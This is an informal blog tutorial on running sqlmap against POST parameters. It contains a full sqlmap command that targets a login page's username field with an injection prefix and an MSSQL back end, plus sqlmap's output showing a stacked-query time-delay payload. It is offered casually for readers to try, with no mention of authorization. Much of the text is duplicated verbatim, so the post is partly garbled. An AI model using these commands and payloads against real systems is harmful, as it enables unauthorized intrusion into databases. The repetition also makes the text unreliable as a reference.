SQLmap and POSTS , rather than GETS
Do you like this story?
Hi guys, wats goin on? hacking on charm? :D
Well, here writing sumthing cool. Giving here a tut for "sqlmap and POST" requests since every most of the tutorials tel u bout the GETS only.. Sounds interesting? Well, n its interesting as well.
So the options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <--Force back-end DBMS to this value
*--dbms= if sqlmap is nt working, it sumeitmes irritates. :)
lets assume that we are having a simple POST request.
3ncrypt0r@bt:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/upgoingstar/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
*--dbms= if sqlmap is nt working, it sumeitmes irritates. :)
lets assume that we are having a simple POST request.
3ncrypt0r@bt:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/upgoingstar/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
Well this is it. try it once and u wud enjoy. :)
have fun.
have fun.
Subscribe to:
Post Comments (Atom)
Posts
0 Responses to “SQLmap and POSTS , rather than GETS”
Post a Comment